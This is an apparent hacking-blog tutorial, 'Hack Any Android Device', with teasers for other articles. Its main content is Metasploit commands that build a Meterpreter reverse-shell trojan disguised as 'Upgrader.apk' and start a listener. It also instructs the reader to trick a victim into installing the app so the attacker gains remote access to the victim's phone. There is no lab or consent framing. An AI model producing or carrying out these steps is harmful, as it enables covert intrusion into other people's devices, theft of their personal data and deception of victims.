Hack Any Android Device

Android devices are widely used around the world; applications are making this platform preferable by millions of users. As these devices are used by many, hackers are exploiting it to harm users and steal personal data.

In this tutorial we are going to learn how to hack any android device with Kali Linux. This tutorial will explain you step by steps:

Step 1:

Open a terminal, and make a Trojan.apk
You can do this by typing :
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)

Step 2:
Open another terminal until the file is being produced.
Load metasploit console, by typing : msfconsole

Step 3:
After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler

Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
To set Lhost type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4:

At last type: exploit to start the listener.
Copy the application that you made (Upgrader.apk) from the root folder, to your android phone.
Send it to victim’s device and let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
And when he clicks Open, exploit will run and you will get access.

However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) Go to security settings of the android phone to allow the Trojan to install. There is condition for this exploit that victim must install/open your sent Trojan, this will allow you to enter victim’s device.

Follow these simple step and exploit any android device.

Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

Top 5 Techniques Hackers Use to hack Social Media Accounts

These days, Social Media have become a significant need in our everyday life. It encourages us to associate and connect with anyone over the...

5 Top Programming Languages for Hacking

We live in the 21st century, which is very fast-changing. This is a century of competition for information and computing resources. Every year the...

OSINT Tutorial to Track An Aircraft And Flight Information In Real-Time

No doubt Internet is said to be the world's largest repository of data and information. It contains an enormous amount of data related to...

Preventing SQL Injection in PHP Applications

SQL injection is one of the most common cybersecurity threats and as the name suggests, it is a form of injection attack. Injection attacks, on...